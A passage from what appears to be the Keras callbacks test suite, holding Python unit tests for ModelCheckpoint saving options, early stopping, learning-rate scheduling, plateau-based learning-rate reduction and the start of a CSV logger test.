keras.layers.Dense(NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'),
keras.layers.Dense(NUM_CLASSES, activation='softmax')
]
model = test_utils.get_model_from_layers(layers, input_shape=(3,))
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'checkpoint.h5')
(x_train, y_train), (x_test, y_test) = test_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
# Case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case 2
mode = 'min'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case 3
mode = 'max'
monitor = 'val_acc'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case 4
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case 5: metric not available.
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor='unknown',
save_best_only=True)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# File won't be written.
assert not os.path.exists(filepath)
# Case 6
save_best_only = False
period = 2
mode = 'auto'
filepath = os.path.join(temp_dir, 'checkpoint.{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
period=period)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=4,
verbose=1)
assert os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=4))
os.remove(filepath.format(epoch=2))
os.remove(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=3))
# Invalid use: this will raise a warning but not an Exception.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode='unknown')
# Case 7: `ModelCheckpoint` with a combination of `save_freq` and `period`.
# Though `period` is deprecated, we're testing it for
# backward-compatibility.
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath, monitor=monitor, mode=mode, save_freq='epoch', period=5)
]
assert not os.path.exists(filepath.format(epoch=0))
assert not os.path.exists(filepath.format(epoch=5))
model.fit(
x_train,
y_train,
batch_size=2,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=10,
verbose=1)
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=2))
assert not os.path.exists(filepath.format(epoch=3))
assert not os.path.exists(filepath.format(epoch=4))
assert os.path.exists(filepath.format(epoch=5))
assert not os.path.exists(filepath.format(epoch=6))
assert os.path.exists(filepath.format(epoch=10))
os.remove(filepath.format(epoch=5))
os.remove(filepath.format(epoch=10))
# Case 8: `ModelCheckpoint` with an integer `save_freq`
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq=15,
period=100) # The period should be ignored (this test tests this).
]
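# With TRAIN_SAMPLES=10 and batch_size=2 there are 5 batches per epoch, so a
# save_freq of 15 batches saves at the end of epochs 3, 6 and 9, as asserted
# below.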
assert not os.path.exists(filepath.format(epoch=3))
model.fit(
x_train,
y_train,
batch_size=2,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=10,
verbose=1)
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=3))
assert not os.path.exists(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=5))
assert os.path.exists(filepath.format(epoch=6))
assert not os.path.exists(filepath.format(epoch=7))
assert not os.path.exists(filepath.format(epoch=8))
assert os.path.exists(filepath.format(epoch=9))
os.remove(filepath.format(epoch=3))
os.remove(filepath.format(epoch=6))
os.remove(filepath.format(epoch=9))
# Case 9: `ModelCheckpoint` with valid and invalid save_freq argument.
with self.assertRaisesRegex(ValueError, 'Unrecognized save_freq'):
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq='invalid_save_freq')
# The following should not raise ValueError.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq='epoch')
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq=3)
# Case 10: `ModelCheckpoint` with valid and invalid `options` argument.
with self.assertRaisesRegex(TypeError, 'tf.train.CheckpointOptions'):
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
save_weights_only=True,
mode=mode,
options=tf.saved_model.SaveOptions())
with self.assertRaisesRegex(TypeError, 'tf.saved_model.SaveOptions'):
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
save_weights_only=False,
mode=mode,
options=tf.train.CheckpointOptions())
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
save_weights_only=True,
mode=mode,
options=tf.train.CheckpointOptions())
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
save_weights_only=False,
mode=mode,
options=tf.saved_model.SaveOptions())
# Case 11: `ModelCheckpoint` save model with batch number in filename.
filepath = os.path.join(temp_dir,
'checkpoint.epoch{epoch:02d}batch{batch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(filepath, monitor=monitor, save_freq=1)
]
assert not os.path.exists(filepath.format(epoch=1, batch=1))
assert not os.path.exists(filepath.format(epoch=1, batch=2))
assert not os.path.exists(filepath.format(epoch=2, batch=1))
assert not os.path.exists(filepath.format(epoch=2, batch=2))
assert not os.path.exists(filepath.format(epoch=3, batch=1))
assert not os.path.exists(filepath.format(epoch=3, batch=2))
assert not os.path.exists(filepath.format(epoch=4, batch=1))
assert not os.path.exists(filepath.format(epoch=4, batch=2))
assert not os.path.exists(filepath.format(epoch=5, batch=1))
assert not os.path.exists(filepath.format(epoch=5, batch=2))
model.fit(
x_train,
y_train,
batch_size=5,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=1)
assert os.path.exists(filepath.format(epoch=1, batch=1))
assert os.path.exists(filepath.format(epoch=1, batch=2))
assert os.path.exists(filepath.format(epoch=2, batch=1))
assert os.path.exists(filepath.format(epoch=2, batch=2))
assert os.path.exists(filepath.format(epoch=3, batch=1))
assert os.path.exists(filepath.format(epoch=3, batch=2))
assert os.path.exists(filepath.format(epoch=4, batch=1))
assert os.path.exists(filepath.format(epoch=4, batch=2))
assert os.path.exists(filepath.format(epoch=5, batch=1))
assert os.path.exists(filepath.format(epoch=5, batch=2))
os.remove(filepath.format(epoch=1, batch=1))
os.remove(filepath.format(epoch=1, batch=2))
os.remove(filepath.format(epoch=2, batch=1))
os.remove(filepath.format(epoch=2, batch=2))
os.remove(filepath.format(epoch=3, batch=1))
os.remove(filepath.format(epoch=3, batch=2))
os.remove(filepath.format(epoch=4, batch=1))
os.remove(filepath.format(epoch=4, batch=2))
os.remove(filepath.format(epoch=5, batch=1))
os.remove(filepath.format(epoch=5, batch=2))
# Case 12: ModelCheckpoint saves model with initial_value_threshold param
mode = 'max'
monitor = 'val_acc'
initial_value_threshold = 0
save_best_only = True
filepath = os.path.join(temp_dir, 'checkpoint.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
initial_value_threshold=initial_value_threshold,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case 13: ModelCheckpoint saves model with initial_value_threshold param
mode = 'auto'
monitor = 'val_loss'
initial_value_threshold = None
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
initial_value_threshold=initial_value_threshold,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case 14: ModelCheckpoint doesn't save model if loss was minimum earlier
mode = 'min'
monitor = 'val_loss'
initial_value_threshold = 0
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
initial_value_threshold=initial_value_threshold,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert not os.path.exists(filepath)
# Case 15: ModelCheckpoint doesn't save model if loss was min earlier in auto
# mode
mode = 'auto'
monitor = 'val_loss'
initial_value_threshold = 0
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
initial_value_threshold=initial_value_threshold,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert not os.path.exists(filepath)
@test_utils.run_v2_only
def test_ModelCheckpoint_subclass_save_weights_false(self):
model = test_utils.get_small_subclass_mlp(NUM_HIDDEN, NUM_CLASSES)
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'checkpoint')
cbks = [keras.callbacks.ModelCheckpoint(
filepath, save_weights_only=False)]
(x_train, y_train), _ = test_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_train = np_utils.to_categorical(y_train, num_classes=NUM_CLASSES)
model.fit(
x_train,
y_train,
callbacks=cbks,
epochs=1,
verbose=0)
# Check that the filepath is a SavedModel directory.
self.assertIn('saved_model.pb', os.listdir(filepath))
def _get_dummy_resource_for_model_checkpoint_testing(self):
def get_input_datasets():
# Simple training input.
train_input = [[1.]] * 16
train_label = [[0.]] * 16
ds = tf.data.Dataset.from_tensor_slices((train_input, train_label))
return ds.batch(8, drop_remainder=True)
# Very simple bias model to eliminate randomness.
optimizer = gradient_descent.SGD(0.1)
model = sequential.Sequential()
model.add(test_utils.Bias(input_shape=(1,)))
model.compile(loss='mae', optimizer=optimizer, metrics=['mae'])
train_ds = get_input_datasets()
temp_dir = self.get_temp_dir()
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
# The filepath shouldn't exist at the beginning.
self.assertFalse(os.path.exists(filepath))
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=True)
return model, train_ds, callback, filepath
def _run_load_weights_on_restart_test_common_iterations(self):
(model, train_ds, callback,
filepath) = self._get_dummy_resource_for_model_checkpoint_testing()
initial_epochs = 3
model.fit(train_ds, epochs=initial_epochs, callbacks=[callback])
# The files should exist after fitting with callback.
for epoch in range(initial_epochs):
self.assertTrue(os.path.exists(filepath.format(epoch=epoch + 1)))
self.assertFalse(os.path.exists(filepath.format(epoch=initial_epochs + 1)))
self.assertEqual(
callback._get_most_recently_modified_file_matching_pattern(filepath),
filepath.format(epoch=initial_epochs))
model.fit(train_ds, epochs=1)
weights_after_one_more_epoch = model.get_weights()
# The filepath should continue to exist after fitting without callback.
for epoch in range(initial_epochs):
self.assertTrue(os.path.exists(filepath.format(epoch=epoch + 1)))
return model, train_ds, filepath, weights_after_one_more_epoch
@staticmethod
def get_ModelCheckpoint_load_weights_on_restart_true_test(save_weights_only):
def func(self):
(model, train_ds, filepath, weights_after_one_more_epoch
) = self._run_load_weights_on_restart_test_common_iterations()
# Sleep for a short time period to ensure the files are created with
# a different time (in MacOS OSS the granularity is only 1 second).
time.sleep(2)
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath,
save_weights_only=save_weights_only,
load_weights_on_restart=True)
model.fit(train_ds, epochs=1, callbacks=[callback])
weights_after_model_restoring_and_one_more_epoch = model.get_weights()
self.assertEqual(
callback._get_most_recently_modified_file_matching_pattern(filepath),
filepath.format(epoch=1))
model.fit(
train_ds,
epochs=1,
callbacks=[
keras.callbacks.ModelCheckpoint(
filepath=filepath,
save_weights_only=save_weights_only,
load_weights_on_restart=True)
])
weights_with_one_final_extra_epoch = model.get_weights()
# Asserting the weights one epoch after initial fitting and another epoch
# after that are close, if a ModelCheckpoint with
# load_weights_on_restart=True is given (so the model is restored at the
# beginning of training).
self.assertAllClose(weights_after_one_more_epoch,
weights_after_model_restoring_and_one_more_epoch)
self.assertNotAllClose(weights_after_one_more_epoch,
weights_with_one_final_extra_epoch)
return func
@staticmethod
def get_ModelCheckpoint_load_weights_on_restart_false_test(save_weights_only):
def func(self):
(model, train_ds, filepath, weights_after_one_more_epoch
) = self._run_load_weights_on_restart_test_common_iterations()
model.fit(
train_ds,
epochs=1,
callbacks=[
keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=save_weights_only)
])
weights_after_model_restoring_and_one_more_epoch = model.get_weights()
# Asserting the weights one epoch after initial fitting and another epoch
# after that are different, if a ModelCheckpoint with
# load_weights_on_restart=False is given (so the model is not restored at
# the beginning of training).
self.assertNotAllClose(weights_after_one_more_epoch,
weights_after_model_restoring_and_one_more_epoch)
return func
test_model_checkpoint_load_weights_on_restart_true_save_weights_only_true = \
get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(True)
test_model_checkpoint_load_weights_on_restart_true_save_weights_only_false = \
get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(False)
test_model_checkpoint_load_weights_on_restart_false_save_weights_only_true = \
get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(True)
test_model_checkpoint_load_weights_on_restart_false_save_weights_only_false \
= get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(False)
def test_ModelCheckpoint_override_if_file_exist(self):
(model, train_ds, filepath,
_) = self._run_load_weights_on_restart_test_common_iterations()
# Sleep for some short time period to ensure the files are created with
# a different time (in MacOS OSS the granularity is only 1 second).
time.sleep(2)
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=True)
model.load_weights(
callback._get_most_recently_modified_file_matching_pattern(filepath))
weights_before_additional_fit = model.get_weights()
model.fit(train_ds, epochs=1, callbacks=[callback])
model.load_weights(
callback._get_most_recently_modified_file_matching_pattern(filepath))
weights_after_additional_fit = model.get_weights()
self.assertNotAllClose(weights_before_additional_fit,
weights_after_additional_fit)
def test_fit_with_ModelCheckpoint_with_tf_config(self):
(model, train_ds, callback,
_) = self._get_dummy_resource_for_model_checkpoint_testing()
os.environ['TF_CONFIG'] = json.dumps({
'cluster': {
'worker': ['localhost:23333']
},
'task': {
'type': 'worker',
'index': 0
}
})
# `model.fit()` should work regardless of the presence of `TF_CONFIG`.
model.fit(train_ds, epochs=1, callbacks=[callback])
def test_fit_with_ModelCheckpoint_with_dir_as_h5_filepath(self):
(model, train_ds, callback,
filepath) = self._get_dummy_resource_for_model_checkpoint_testing()
temp_dir = self.get_temp_dir()
filepath = os.path.join(temp_dir, 'temp.h5')
self.assertFalse(os.path.exists(filepath))
os.mkdir(filepath)
self.assertTrue(os.path.exists(filepath))
callback = keras.callbacks.ModelCheckpoint(filepath=filepath)
with self.assertRaisesRegex(
IOError, 'Please specify a non-directory '
'filepath for ModelCheckpoint.'):
model.fit(train_ds, epochs=1, callbacks=[callback])
def test_ModelCheckpoint_with_bad_path_placeholders(self):
(model, train_ds, callback,
filepath) = self._get_dummy_resource_for_model_checkpoint_testing()
temp_dir = self.get_temp_dir()
filepath = os.path.join(temp_dir, 'chkpt_{epoch:02d}_{mape:.2f}.h5')
callback = keras.callbacks.ModelCheckpoint(filepath=filepath)
with self.assertRaisesRegex(KeyError, 'Failed to format this callback '
'filepath.*'):
model.fit(train_ds, epochs=1, callbacks=[callback])
def test_ModelCheckpoint_nonblocking(self):
filepath = self.get_temp_dir()
# Should only cause a sync block when saving is actually performed.
callback = keras.callbacks.ModelCheckpoint(filepath=filepath, save_freq=100)
self.assertTrue(callback._supports_tf_logs)
model = keras.Sequential([keras.layers.Dense(1)])
cb_list = keras.callbacks.CallbackList([callback],
model=model,
epochs=1,
steps=10,
verbose=0)
tensor = tf.convert_to_tensor(1.)
def mock_numpy():
raise RuntimeError(
'If this error is seen, ModelCheckpoint is causing a blocking '
'NumPy conversion even when not checkpointing.')
tensor.numpy = mock_numpy
logs = {'metric': tensor}
cb_list.on_train_begin(logs)
cb_list.on_epoch_begin(0, logs)
cb_list.on_train_batch_begin(0, logs)
cb_list.on_train_batch_end(0, logs)
cb_list.on_epoch_end(0, logs)
cb_list.on_train_end(logs)
cb_list.on_test_begin(logs)
cb_list.on_test_batch_begin(0, logs)
cb_list.on_test_batch_end(0, logs)
cb_list.on_test_end(logs)
cb_list.on_predict_begin(logs)
cb_list.on_predict_batch_begin(logs)
cb_list.on_predict_batch_end(logs)
cb_list.on_predict_end(logs)
def test_verbose_2_logging(self):
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = keras.models.Sequential((keras.layers.Dense(
1, input_dim=1, activation='relu'), keras.layers.Dense(
1, activation='sigmoid'),))
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
expected_log = r'(.*- loss:.*- acc.*:.*epoch)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(data, labels, verbose=2, epochs=20)
self.assertRegex(printed.contents(), expected_log)
def test_ProgbarLogger_verbose_2_nonblocking(self):
# Should only cause a sync block on epoch end methods.
callback = keras.callbacks.ProgbarLogger(count_mode='steps')
self.assertTrue(callback._supports_tf_logs)
model = keras.Sequential([keras.layers.Dense(1)])
cb_list = keras.callbacks.CallbackList([callback],
model=model,
epochs=1,
steps=10,
verbose=2)
tensor = tf.convert_to_tensor(1.)
def mock_numpy():
raise RuntimeError(
'If this error is seen, ModelCheckpoint is causing a blocking '
'NumPy conversion even when not checkpointing.')
tensor.numpy = mock_numpy
logs = {'metric': tensor}
cb_list.on_train_begin(logs)
cb_list.on_epoch_begin(0, logs)
cb_list.on_train_batch_begin(0, logs)
cb_list.on_train_batch_end(0, logs)
cb_list.on_test_begin(logs)
cb_list.on_test_batch_begin(0, logs)
cb_list.on_test_batch_end(0, logs)
cb_list.on_test_end(logs)
with self.assertRaisesRegex(RuntimeError, 'NumPy conversion'):
# on_epoch_end should still block.
cb_list.on_epoch_end(0, logs)
cb_list.on_train_end(logs)
def test_EarlyStopping(self):
with self.cached_session():
np.random.seed(123)
(x_train, y_train), (x_test, y_test) = test_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = test_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
cases = [
('max', 'val_acc'),
('min', 'val_loss'),
('auto', 'val_acc'),
('auto', 'loss'),
('unknown', 'unknown')
]
for mode, monitor in cases:
patience = 0
cbks = [
keras.callbacks.EarlyStopping(
patience=patience, monitor=monitor, mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
def test_EarlyStopping_reuse(self):
with self.cached_session():
np.random.seed(1337)
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = keras.models.Sequential((keras.layers.Dense(
1, input_dim=1, activation='relu'), keras.layers.Dense(
1, activation='sigmoid'),))
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
weights = model.get_weights()
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
stopper = keras.callbacks.EarlyStopping(monitor='acc', patience=patience)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_with_baseline(self):
with self.cached_session():
np.random.seed(1337)
baseline = 0.6
(data, labels), _ = test_utils.get_test_data(
train_samples=100,
test_samples=50,
input_shape=(1,),
num_classes=NUM_CLASSES)
model = test_utils.get_small_sequential_mlp(
num_hidden=1, num_classes=1, input_dim=1)
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['acc'])
stopper = keras.callbacks.EarlyStopping(monitor='acc',
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) == 2
patience = 3
stopper = keras.callbacks.EarlyStopping(monitor='acc',
patience=patience,
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_final_weights_when_restoring_model_weights(self):
class DummyModel:
def __init__(self):
self.stop_training = False
self.weights = -1
def get_weights(self):
return self.weights
def set_weights(self, weights):
self.weights = weights
def set_weight_to_epoch(self, epoch):
self.weights = epoch
early_stop = keras.callbacks.EarlyStopping(monitor='val_loss',
patience=2,
restore_best_weights=True)
early_stop.model = DummyModel()
losses = [0.2, 0.15, 0.1, 0.11, 0.12]
# The best configuration is in epoch 2 (loss = 0.1000).
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
# The best configuration is in epoch 2 (loss = 0.1000),
# and while patience = 2, we're restoring the best weights,
# so we end up at the epoch with the best weights, i.e. epoch 2
self.assertEqual(early_stop.model.get_weights(), 2)
# Check early stopping when no model beats the baseline.
early_stop = keras.callbacks.EarlyStopping(
monitor='val_loss', patience=5, baseline=0.5, restore_best_weights=True)
early_stop.model = DummyModel()
losses = [0.9, 0.8, 0.7, 0.71, 0.72, 0.73]
# The best configuration is in epoch 2 (loss = 0.7000).
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
# No epoch improves on the baseline, so we should train for only 5 epochs,
# and restore the second model.
self.assertEqual(epochs_trained, 5)
self.assertEqual(early_stop.model.get_weights(), 2)
def test_RemoteMonitor(self):
if requests is None:
self.skipTest('`requests` required to run this test')
return None
monitor = keras.callbacks.RemoteMonitor()
# This will raise a warning since the default address is unreachable:
monitor.on_epoch_end(0, logs={'loss': 0.})
def test_LearningRateScheduler(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = test_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = test_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [
keras.callbacks.LearningRateScheduler(
lambda x: 1. / (1. + x), verbose=1)
]
io_utils.enable_interactive_logging()
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5)
self.assertIn('LearningRateScheduler setting learning rate to 1.0',
printed.contents())
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.2) < keras.backend.epsilon()
cbks = [keras.callbacks.LearningRateScheduler(lambda x, lr: lr / 2)]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.01 / 4) < keras.backend.epsilon()
cbks = [
keras.callbacks.LearningRateScheduler(
lambda epoch, _: learning_rate_schedule.CosineDecay(0.01, 2)
(epoch))
]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
cosine_decay_np = 0.5 * (1 + np.cos(np.pi * (1 / 2)))
decayed_learning_rate = 0.01 * cosine_decay_np
assert (float(keras.backend.get_value(model.optimizer.lr)) -
decayed_learning_rate) < keras.backend.epsilon()
def test_ReduceLROnPlateau(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = test_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
tf.compat.v1.set_random_seed(1234)
np.random.seed(1337)
model = test_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=gradient_descent.SGD(lr=0.1))
return model
# TODO(psv): Make sure the callback works correctly when min_delta is
# set as 0. Test fails when the order of this callback and assertion is
# interchanged.
model = make_model()
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=0,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.1, atol=1e-4)
model = make_model()
# This should reduce the LR after the first epoch (due to the high min_delta).
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=10,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=2)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.01, atol=1e-4)
def test_ReduceLROnPlateau_patience(self):
class DummyOptimizer:
def __init__(self):
self.lr = keras.backend.variable(1.0)
class DummyModel:
def __init__(self):
self.optimizer = DummyOptimizer()
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(
monitor='val_loss', patience=2)
reduce_on_plateau.model = DummyModel()
losses = [0.0860, 0.1096, 0.1040]
lrs = []
for epoch in range(len(losses)):
reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
lrs.append(keras.backend.get_value(reduce_on_plateau.model.optimizer.lr))
# The learning rates should be 1.0 except the last one
for lr in lrs[:-1]:
self.assertEqual(lr, 1.0)
self.assertLess(lrs[-1], 1.0)
def test_ReduceLROnPlateau_backwards_compatibility(self):
with tf.compat.v1.test.mock.patch.object(logging, 'warning') as mock_log:
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(epsilon=1e-13)
self.assertRegex(
str(mock_log.call_args), '`epsilon` argument is deprecated')
self.assertFalse(hasattr(reduce_on_plateau, 'epsilon'))
self.assertTrue(hasattr(reduce_on_plateau, 'min_delta'))
self.assertEqual(reduce_on_plateau.min_delta, 1e-13)
def test_CSVLogger(self):
with self.cached_session():
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'log.tsv')
sep = '\t'
(x_train, y_train), (x_test, y_test) = test_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = test_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=gradient_descent.SGD(lr=0.1),
metrics=['accuracy'])
return model
# case 1, create new file with defined separator
